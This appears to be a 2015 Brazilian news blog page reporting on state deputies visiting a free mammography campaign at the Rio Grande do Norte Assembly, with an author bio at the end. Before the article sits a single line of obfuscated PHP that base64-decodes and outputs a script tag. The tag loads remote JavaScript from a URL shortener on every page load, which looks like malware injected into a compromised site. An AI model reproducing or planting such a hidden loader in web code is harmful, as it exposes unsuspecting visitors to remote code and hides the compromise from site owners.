$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Deputados estaduais visitam trabalho de ação de prevenção ao câncer de mama na Assembleia

Deputados estaduais visitam trabalho de ação de prevenção ao câncer de mama na Assembleia
03 Out 2015

Deputados estaduais e outras autoridades visitaram ontem o segundo dia da ação de prevenção ao câncer de mama, que acontece na Assembleia. A deputada Márcia Maia (PSB) e o presidente da Casa Ezequiel Ferreira de Souza (PMDB), acompanhado de familiares, fizeram homenagem a Savana Galvão, que faleceu vítima da doença e dá o nome a unidade móvel do Grupo Reviver, responsável por oferecer exames de mamografia gratuitamente.

“Esse projeto é uma demonstração de amor pelas pessoas, a realização é um sucesso absoluto. Foram realizadas várias parcerias e vamos lutar para que o Governo do Estado libere as emendas que os deputados votaram para o Grupo Reviver. A importância do exame é fundamental para se detectar em tempo hábil os casos de câncer e poder salvar vidas das norte-riograndenses”, destacou Ezequiel Ferreira.

Todos os anos, surgem 800 novos casos de câncer de mama no Rio Grande do Norte. Segundo a Sociedade de Mastologia, 200 mulheres morrem por ano no Estado por causa da doença devido a falta de diagnóstico precoce, responsável pela cura em 95% dos casos. Pensando nisso, o Poder Legislativo em parceria com o Grupo Reviver está oferecer gratuitamente exames de mamografia. A Unidade Móvel é equipada com mamógrafo e tem capacidade para realizar 80 exames de mamografia por dia.

A deputada Márcia Maia (PSB) também visitou a unidade e elogiou a ação do Grupo Reviver. “Que sensação boa de poder ajudar a tantas mulheres que muitas vezes têm dificuldades de acesso a uma mamografia. A prevenção é a chave de tudo e nos casos de câncer aumenta a probabilidade de cura. O Grupo Reviver e a Assembleia Legislativa estão de parabéns”, disse Márcia. O secretário de Saúde de Natal, Luiz Roberto Fonseca, e a vereadora Eleika Bezerra (PSDC) também visitaram a unidade instalada em frente à Assembleia.

As campanhas de exames preventivos ao câncer de mama se estendem pela cidade ao longo do mês de outubro com a seguinte programação: de 5 a 9 na Policlínica Municipal da Zona Norte; de 12 a 16 na Unidade de Saúde de Nordelândia; de 19 a 23 na Policlínica de Cidade da Esperança; de 26 a 30 na Policlínica Zeca Passos.

unnamed (9)

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *